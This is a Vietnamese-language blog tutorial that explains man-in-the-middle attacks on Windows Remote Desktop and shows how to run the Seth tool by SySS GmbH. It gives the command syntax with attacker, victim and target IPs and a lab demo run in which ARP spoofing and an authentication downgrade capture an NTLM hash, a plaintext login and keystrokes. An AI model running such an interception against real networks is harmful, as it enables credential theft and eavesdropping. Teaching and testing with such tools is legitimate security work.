 |
| Seth - SySS |
Giới thiệu về MITM và RDP
Phương pháp tấn công MITM:
MITM hay Man-in-the-Middle (dịch ra là Người ở Giữa) là một phương pháp cho phép attacker can thiệp vào kết nối Internet của người khác và thu thập mọi thông tin truyền trên hệ thống mạng đó. Phương pháp này có thể hiểu đơn giản là nghe trộm. |
| Minh hoạ một kiểu tấn công MITM |
Giao thức RDP:
RDP hay Remote Desktop Protocol là một tính năng sẵn có trong hệ điều hành Windows, với tính năng này, bạn sẽ dễ dàng điều khiển các máy tính khác, hay để máy tính khác kết nối điều khiển máy tính mình. Và vì cũng là một giao thức qua mạng nên việc tấn công MITM hoàn toàn khả thi.Seth - Công cụ tấn công MITM giao thức RDP:
Tác giả: Adrian Vollmer (SySS GmbH)
Trang dự án: SySS-Research/Seth - Github
Hướng dẫn sử dụng Seth:
Cú pháp lệnh:
[[mcode]]$ seth <interface> <attacker-ip> <victim-ip> <target-ip> [tuỳ-chọn][[ecode]]Lệnh rút gọn: (xem phần Mẫu)
Tuỳ chọn và tham số:
Với mỗi tuỳ chọn thì sẽ đi kèm với một tham số:* Tham số bắt buộc:
[[scode]]<interface>[[escode]]: Tên card mạng sử dụng, nếu là card không dây thì phải chuyển sang monitor-mode.
[[scode]]<attacker-ip>[[escode]]: Địa chỉ IP của máy tấn công, đang chạy script này.
[[scode]]<victim-ip>[[escode]]: Địa chỉ IP của máy nạn nhân, đang yêu cầu điều khiển.
[[scode]]<target-ip>[[escode]]: Địa chỉ IP mục tiêu. Điền vào địa chỉ IP của máy RDP nếu máy RDP cùng mạng con với máy nạn nhân. Còn các trường hợp khác, hãy điền vào IP của gateway.
Mẫu:
Điều kiện:- Địa chỉ máy tấn công: 192.168.57.103
- Địa chỉ máy nạn nhân: 192.168.57.2
- Địa chỉ máy chạy dịch vụ RDP: 192.168.57.102
Vì ta có 3 IP có cùng tiền tố là 192.168.57.x nên ta có thể viết tắt như sau:
 |
| Thử chạy Seth. |
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press: LShift
Key press: S
Key release: S
Key release: LShift
Key press: E
Key release: E
Key press: C
Key release: C
Key press: R
Key release: R
Key press: E
Key release: E
Key press: T
Key release: T
Connection lost
[*] Cleaning up...
[*] Done.[[ecode]]
Video Demo:
Tham khảo quantrimang | pcworld
0 Comments